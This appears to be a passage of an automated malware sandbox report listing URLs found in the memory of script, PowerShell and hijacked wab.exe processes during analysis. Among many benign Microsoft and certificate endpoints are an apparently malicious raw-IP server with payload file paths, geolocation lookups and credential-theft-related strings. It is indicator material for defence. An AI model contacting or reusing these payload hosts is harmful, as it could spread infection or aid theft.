                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.2
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.24
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD808F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2293994256.0000026CD6A44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/
                Source: wab.exe, 00000009.00000002.2993796074.00000000065E8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3004785425.00000000217A0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/NtqoCaH77.bin
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/U
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Ud
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Udm
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Udma
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Udmag
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Udmagr
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Udmagre
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Udmagret
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Udmagret.
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Udmagret.h
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Udmagret.hh
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2293994256.0000026CD67F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Udmagret.hhk
                Source: powershell.exe, 00000004.00000002.2227965271.00000000043CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237.86.247/Udmagret.hhkXR
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD808F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.237H
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                Source: bhv5123.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                Source: bhv5123.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                Source: powershell.exe, 00000004.00000002.2232934862.0000000006C5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro?
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                Source: bhv5123.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                Source: wscript.exe, 00000000.00000003.1712635301.0000027D86CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                Source: wscript.exe, 00000000.00000002.1720789824.0000027D84D3A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718407955.0000027D84D3A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717846950.0000027D84D2F000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: wscript.exe, 00000000.00000003.1713343554.0000027D84DDB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713257774.0000027D84DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabS
                Source: wscript.exe, 00000000.00000002.1720789824.0000027D84D3A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1718407955.0000027D84D3A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717846950.0000027D84D2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en7;
                Source: wscript.exe, 00000000.00000003.1713343554.0000027D84DAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713257774.0000027D84D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?797d5b5f55
                Source: wab.exe, 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2373759125.000000000665F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2257022669.000000000665F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2993796074.000000000665F000.00000004.00000020.00020000.00000000.sdmp, bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://geoplugin.net/json.gp
                Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpC
                Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpW
                Source: wab.exe, 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpk
                Source: wab.exe, 00000009.00000002.2993796074.0000000006623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpt
                Source: powershell.exe, 00000001.00000002.2377560186.0000026CE6643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230426508.0000000005418000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0:
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0H
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0I
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0Q
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://ocsp.msocsp.com0
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://ocsp.msocsp.com0S
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://ocspx.digicert.com0E
                Source: powershell.exe, 00000004.00000002.2227965271.00000000043CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2232934862.0000000006C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD65D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2227965271.0000000004271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.2227965271.00000000043CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2232934862.0000000006C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: bhv5123.tmp.13.drString found in binary or memory: http://www.digicert.com/CPS0
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://www.digicert.com/CPS0~
                Source: wab.exe, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                Source: wab.exe, wab.exe, 0000000C.00000002.2307273429.000000000338D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2368598041.0000000002F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                Source: wab.exe, 00000009.00000002.3005282213.00000000220F0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: wab.exe, 00000009.00000002.3005282213.00000000220F0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.2306940692.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                Source: wab.exe, 0000000C.00000002.2307273429.000000000338D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2368598041.0000000002F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comta
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
                Source: wab.exe, 0000000A.00000002.2348371588.0000000002F03000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2372810283.0000000002D83000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                Source: wab.exe, 00000010.00000002.2367729932.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
                Source: bhv5123.tmp.13.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
                Source: bhv5123.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                Source: bhv5123.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD65D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000004.00000002.2227965271.0000000004271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                Source: bhv5123.tmp.13.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                Source: powershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                Source: powershell.exe, 00000004.00000002.2227965271.00000000043CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2232934862.0000000006C9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000001.00000002.2293994256.0000026CD7869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: bhv5123.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: bhv5123.tmp.13.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: wab.exe, 0000000A.00000003.2323238256.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2329290801.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2323238256.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2329963298.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2347870319.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2330023743.0000000004ECE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2347553603.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2348008932.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2348845487.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2333304512.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2347754386.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2347652939.0000000004EC0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2370974438.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2371322290.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2370073946.0000000004CC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2367929927.0000000004CC1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2369245818.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2369402203.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2374590709.0000000004CCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2369461857.0000000004CCE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2371465726.0000000004CCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
                Source: wab.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                Source: powershell.exe, 00000001.00000002.2377560186.0000026CE6643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230426508.0000000005418000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230426508.00000000052DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
                Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
